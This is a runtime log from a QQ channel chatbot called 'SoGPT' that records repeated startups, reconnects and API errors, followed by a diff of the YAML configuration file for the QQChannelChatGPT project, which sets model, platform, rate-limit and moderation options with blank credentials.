2022-12-08 17:00:30,583 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:00:30,584 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:00:30,585 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:00:30,585 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:00:30,839 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:00:30,943 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:00:30,944 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:00:53,548 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:2ea547d78364cea60583ed450e589a17
|
||||
2022-12-08 17:10:31,405 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:10:32,081 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:10:32,082 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:10:32,083 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:10:32,083 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:10:32,342 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:10:32,449 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:10:32,450 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:13:47,495 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:13:47,993 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:13:47,994 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:13:47,995 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:13:47,995 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:13:48,198 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:13:48,300 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:13:48,302 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:16:31,326 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 17:22:03,924 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 17:22:04,671 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 17:22:04,672 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:22:04,673 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:22:04,673 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:22:04,856 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 17:22:04,958 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 17:22:04,959 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:52:04,868 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 17:52:09,874 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 17:52:09,876 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 17:52:09,877 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 17:52:10,104 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 17:52:10,170 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 17:52:10,171 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:00:00,757 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:00:01,443 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:00:01,443 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:00:01,444 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:00:01,445 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:00:01,602 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:00:01,823 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:00:01,824 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:03:13,211 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:03:14,082 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:03:14,084 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:03:14,084 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:03:14,085 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:03:14,289 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:03:14,498 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:03:14,499 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:16:29,246 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:16:30,054 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:16:30,055 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:16:30,056 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:16:30,056 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:16:30,293 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:16:30,424 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:16:30,424 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:16:41,898 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:3cc9fc95ac27cbbc1f1667f1aa11bf8d
|
||||
2022-12-08 18:18:16,615 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:18:17,399 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:18:17,400 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:18:17,400 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:18:17,401 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:18:17,606 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:18:17,731 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:18:17,732 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:19:07,357 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:19:07,941 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:19:07,942 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:19:07,942 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:19:07,943 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:19:08,247 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:19:08,335 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:19:08,336 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:20:46,416 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:20:47,023 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:20:47,023 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:20:47,024 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:20:47,025 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:20:47,475 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:20:47,640 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:20:47,641 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:21:24,437 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:21:24,991 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:21:24,992 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:21:24,993 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:21:24,993 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:21:25,165 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:21:25,265 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:21:25,266 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:24:18,469 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:24:19,076 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:24:19,077 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:24:19,077 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:24:19,078 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:24:19,252 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:24:19,339 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:24:19,341 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:27:13,898 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:27:14,553 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:27:14,554 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:27:14,554 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:27:14,555 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:27:14,747 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:27:14,850 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:27:14,851 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:30:47,647 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:30:48,327 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:30:48,328 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:30:48,329 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:30:48,330 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:30:48,736 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:30:48,873 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:30:48,874 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 18:31:57,250 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 18:31:57,955 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 18:31:57,956 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 18:31:57,957 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 18:31:57,957 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 18:31:58,165 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 18:31:58,269 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 18:31:58,270 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 19:01:58,099 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 19:02:03,110 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 19:02:03,111 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 19:02:03,111 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 19:02:03,314 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 19:02:03,381 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 19:02:03,382 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 19:32:03,274 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 19:32:08,271 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 19:32:08,272 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 19:32:08,272 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 19:32:08,534 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 19:32:08,604 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 19:32:08,605 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:02:08,495 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 20:02:13,497 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:02:13,497 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:02:13,498 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:02:13,797 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 20:02:13,914 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 20:02:13,915 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:31:53,159 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 20:31:58,306 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 20:31:58,307 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:31:58,308 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:31:58,308 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:31:58,748 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 20:31:58,924 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 20:31:58,925 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:34:26,596 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 20:34:27,610 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 20:34:27,611 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:34:27,613 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:34:27,613 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:34:27,919 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 20:34:28,022 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 20:34:28,023 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:35:47,952 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 20:35:48,499 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 20:35:48,500 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 20:35:48,500 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 20:35:48,501 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 20:35:48,723 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 20:35:48,793 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 20:35:48,794 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 20:55:03,450 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:c4c4d23f9b2829d03ae9a7dca0184fe9
|
||||
2022-12-08 21:05:48,678 [INFO] (gateway.py:54)on_closed [botpy] 关闭, 返回码: 4009, 返回信息: Session timed out
|
||||
2022-12-08 21:05:53,700 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:05:53,701 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:05:53,702 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:05:54,145 [INFO] (gateway.py:169)ws_resume [botpy] 重连启动...
|
||||
2022-12-08 21:05:54,232 [INFO] (gateway.py:85)on_message [botpy] 机器人重连成功!
|
||||
2022-12-08 21:05:54,233 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:07:39,468 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:07:40,244 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:07:40,245 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:07:40,246 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:07:40,247 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:07:40,553 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:07:40,659 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:07:40,660 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:30:11,249 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:30:12,217 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:30:12,218 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:30:12,219 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:30:12,219 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:30:12,627 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:30:12,730 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:30:12,731 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:36:34,660 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:38:39,294 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:39:43,233 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:39:43,878 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:39:43,879 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:39:43,880 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:39:43,880 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:39:44,099 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:39:44,279 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:39:44,281 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:40:38,103 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:40:39,100 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:40:39,101 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:40:39,102 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:40:39,102 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:40:39,402 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:40:39,502 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:40:39,503 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:40:52,805 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:41:39,703 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:41:40,399 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:41:40,400 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:41:40,401 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:41:40,401 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:41:40,644 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:41:40,740 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:41:40,741 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:41:56,705 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 21:42:55,625 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 21:42:56,278 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 21:42:56,279 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 21:42:56,280 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 21:42:56,281 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 21:42:56,718 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 21:42:56,819 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 21:42:56,820 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 21:43:09,794 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150658/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
@@ -1,53 +1,114 @@
|
||||
# 如果你不知道怎么部署,请务必查看https://soulter.top/posts/qpdg.html
|
||||
# 如果你不知道怎么部署,请查看https://soulter.top/posts/qpdg.html
|
||||
# 不一定需要key了,如果你没有key但有openAI账号或者必应账号,可以考虑使用下面的逆向库
|
||||
|
||||
# 注意:已支持多key自动切换,方法:
|
||||
# key:
|
||||
# - sk-xxxxxx
|
||||
# - sk-xxxxxx
|
||||
# 在下方非注释的地方使用以上格式
|
||||
openai:
|
||||
key:
|
||||
-
|
||||
|
||||
# 这里是GPT配置,语言模型默认使用gpt-3.5-turbo
|
||||
chatGPTConfigs:
|
||||
model: gpt-3.5-turbo
|
||||
max_tokens: 1500
|
||||
temperature: 0.9
|
||||
top_p: 1
|
||||
frequency_penalty: 0
|
||||
presence_penalty: 0
|
||||
|
||||
total_tokens_limit: 2800
|
||||
###############平台设置#################
|
||||
|
||||
# QQ频道机器人
|
||||
# QQ开放平台的appid和令牌
|
||||
# q.qq.com
|
||||
# enable为true则启用,false则不启用
|
||||
qqbot:
|
||||
enable: true
|
||||
appid:
|
||||
token:
|
||||
|
||||
# QQ机器人
|
||||
# enable为true则启用,false则不启用
|
||||
# 需要安装GO-CQHTTP配合使用。
|
||||
# 文档:https://docs.go-cqhttp.org/
|
||||
# 请将go-cqhttp的配置文件的sever部分粘贴为以下内容,否则无法使用
|
||||
# 请先启动go-cqhttp再启动本程序
|
||||
#
|
||||
# servers:
|
||||
# - http:
|
||||
# host: 127.0.0.1
|
||||
# version: 0
|
||||
# port: 5700
|
||||
# timeout: 5
|
||||
# - ws:
|
||||
# address: 127.0.0.1:6700
|
||||
# middlewares:
|
||||
# <<: *default
|
||||
gocqbot:
|
||||
enable: false
|
||||
|
||||
# 设置是否一个人一个会话
|
||||
uniqueSessionMode: false
|
||||
|
||||
# QChannelBot 的版本,请勿修改此字段,否则可能产生一些bug
|
||||
version: 2.5 RealChatGPT Ver.
|
||||
|
||||
version: 3.0
|
||||
# [Beta] 转储历史记录时间间隔(分钟)
|
||||
dump_history_interval: 10
|
||||
|
||||
# 一个用户只能在time秒内发送count条消息
|
||||
limit:
|
||||
time: 60
|
||||
count: 5
|
||||
# 公告
|
||||
notice: "此机器人由Github项目QQChannelChatGPT驱动。"
|
||||
|
||||
# 是否打开私信功能
|
||||
# 设置为true则频道成员可以私聊机器人。
|
||||
# 设置为false则频道成员不能私聊机器人。
|
||||
direct_message_mode: true
|
||||
|
||||
################外带程序(插件)################
|
||||
# 系统代理
|
||||
# http_proxy: http://localhost:7890
|
||||
# https_proxy: http://localhost:7890
|
||||
|
||||
# 自定义回复前缀,如[Rev]或其他,务必加引号以防止不必要的bug。
|
||||
reply_prefix:
|
||||
openai_official: "[GPT]"
|
||||
rev_chatgpt: "[Rev]"
|
||||
rev_edgegpt: "[RevBing]"
|
||||
|
||||
# 百度内容审核服务
|
||||
# 新用户免费5万次调用。https://cloud.baidu.com/doc/ANTIPORN/index.html
|
||||
baidu_aip:
|
||||
enable: false
|
||||
app_id:
|
||||
api_key:
|
||||
secret_key:
|
||||
|
||||
|
||||
|
||||
|
||||
###############语言模型设置#################
|
||||
|
